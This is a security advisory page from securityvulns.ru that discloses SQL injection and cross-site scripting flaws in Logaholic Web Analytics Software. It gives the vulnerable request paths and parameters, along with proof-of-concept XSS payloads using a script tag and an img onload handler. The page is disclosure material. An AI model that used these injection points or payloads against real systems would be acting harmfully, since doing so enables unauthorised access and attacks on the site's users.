Computer Security

Security Advisory: Logaholic Web Analytics Software
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Jupiter Cms Multiple Vulnerabilities

  [waraxe-2007-SA#060] - Sensitive info disclosure in CuteNews <= 1.4.5

  [ISecAuditors Security Advisories] Tikiwiki CMS is vulnerable to path traversal attack

  Tikiwiki 1.9.8.3 tiki-special_chars.
php XSS Vulnerability

From:malibu.r_(at)_hotmail.com <malibu.r_(at)_hotmail.com>
Date:24.12.2007
Subject:Logaholic Web Analytics Software

# Logaholic Web Analytics Software
# Bug found by malibu.r
# Contact: malibu.r@hotmail.com
#

[*]SQL Injection

GET /logaholic/index.php?conf=nameofprofile&from=SQL INJECTION
GET /logaholic/update.php?conf=nameofprofile&page=SQL INjection


[*]Cross Site Scripting

POST variable "newconfname" in  profiles.php?conf=nameofprofile to
>"><ScRiPt%20%0a%0d>alert(xss)%3B</Sc
RiPt> in /logaholic/profiles.php

index.php?conf=<img+src=http://testingsite.com/yep.gif+onload=alert(812051443)
>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 


Rating@Mail.ru